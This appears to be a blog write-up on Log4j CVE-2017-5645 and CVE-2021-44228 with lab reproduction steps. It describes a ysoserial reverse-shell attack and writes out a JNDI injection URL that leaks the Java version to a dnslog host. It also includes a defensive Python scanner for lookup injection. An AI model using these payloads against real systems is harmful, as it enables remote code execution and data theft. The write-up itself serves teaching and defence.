Apache log4j vulnerability summary

Table of contents

Introduction to log4j

tool link

Vulnerability recurrence

CVE-2017-5645 (Log4j deserialization vulnerability)

Environment build

Vulnerability principle

Affected version

Vulnerability recurrence

CVE-2021-44228 (Log4j 2 Remote Code Execution Vulnerability)

Environment build

Vulnerability principle

Affected version

Vulnerability recurrence


Introduction to log4j

Apache Log4j is a logging library for Java that supports starting remote log servers.

tool link

Vulnerability recurrence

CVE-2017-5645 (Log4j deserialization vulnerability)

Environment build

  • Attacker IP 121.36.20.179
  • Server IP 171.20.10.5

Vulnerability principle

Apache Log4j 2.x before 2.8.2 deserializes log events received by its socket server without validating them, so an attacker who can reach that listening port can execute arbitrary code.

Affected version

  • Log4j 2.x < 2.8.2

Vulnerability recurrence

1. Switch to the CVE-2017-5645 directory and run `docker-compose up -d`. Then run `docker-compose ps`: port 4712 is open, which means the environment has been built successfully.

2. Use an online tool to base64-encode the shell command.

3. Use the ysoserial tool to send the payload to port 4712 on the server.

4. Listen on port 4445 of the attack machine and wait for the reverse shell; the shell connects back successfully.

CVE-2021-44228 (Log4j 2 Remote Code Execution Vulnerability)

Environment build

  • Server IP 121.36.20.179

Vulnerability principle

Log4j 2 versions 2.0 through 2.14.1 contain a JNDI injection vulnerability. When an attacker controls content that gets logged, a lookup such as `${jndi:ldap://xxx.dns.com/command}` placed in the log message makes Log4j perform a JNDI lookup against the attacker's server, which leads to arbitrary code execution.

Affected version

  • 2.0 <= Log4j 2 <= 2.14.1

Vulnerability recurrence

1. Switch to the CVE-2021-44228 directory and run `docker-compose up -d`. Then open port 8983 on the server in a browser; if the page loads, the environment has been built successfully.

2. Then visit the path `http://121.36.20.179:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.ekbkqh.dnslog.cn}`. Note: `ekbkqh.dnslog.cn` is the subdomain generated by dnslog (marked in red in the original screenshot). The vulnerability is confirmed when a resolution record for that domain appears in dnslog.
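As an added example (not code from the original post), the Python scanner below parses Log4j's `${prefix:value}` lookup grammar, including the nested `${sys:...}` form used in the request above, and flags any request or log line that carries a `jndi` lookup; the sample lines and the hostnames in them are constructed placeholders.

```python
"""Flag Log4j 2 lookup injection (the CVE-2021-44228 pattern) in request or log lines.
Added example, not code from the original post; the sample lines are constructed."""
from typing import List, Tuple

# Log4j lowercases a lookup's prefix before dispatching it, so compare
# prefixes case-insensitively here as well.
JNDI = "jndi"
DATA_LOOKUPS = {"sys", "env", "java"}  # lookups that read JVM or host data

def parse_lookups(text: str) -> List[Tuple[str, str]]:
    """Return (prefix, raw_value) for every ${prefix:value} in text, nested
    lookups innermost first (the order in which Log4j resolves them)."""
    found, opens, i = [], [], 0
    while i < len(text):
        if text.startswith("${", i):
            opens.append(i + 2)      # body of this lookup starts here
            i += 2
            continue
        if text[i] == "}" and opens:
            inner = text[opens.pop():i]
            prefix, sep, value = inner.partition(":")
            if sep:                  # "${foo}" without a colon is not a lookup
                found.append((prefix.strip().lower(), value))
        i += 1
    return found                     # an unclosed "${" is never resolved

def classify(line: str) -> str:
    """One verdict per line: jndi-injection, data-lookup, lookup or clean."""
    prefixes = {p for p, _ in parse_lookups(line)}
    if JNDI in prefixes:
        return "jndi-injection"
    if prefixes & DATA_LOOKUPS:
        return "data-lookup"
    return "lookup" if prefixes else "clean"

def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """(1-based line number, verdict) for every line that is not clean."""
    verdicts = [(n, classify(l)) for n, l in enumerate(lines, 1)]
    return [(n, v) for n, v in verdicts if v != "clean"]

# Constructed sample access-log lines; the hostnames are placeholders.
SAMPLE_LINES = [
    "GET /solr/admin/cores?action=STATUS HTTP/1.1",
    "GET /solr/admin/cores?action=${jndi:ldap://${sys:java.version}.dnslog.invalid/a} HTTP/1.1",
    "GET /index.html?user=${env:USER} HTTP/1.1",
]

if __name__ == "__main__":
    for n, verdict in scan(SAMPLE_LINES):
        print(f"line {n}: {verdict}")
```

The fix itself is upgrading to Log4j 2.16.0 or later, which disables JNDI by default and no longer evaluates lookups in log messages; a scanner like this only helps find attempts in existing logs.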


Origin: blog.csdn.net/smli_ng/article/details/126114488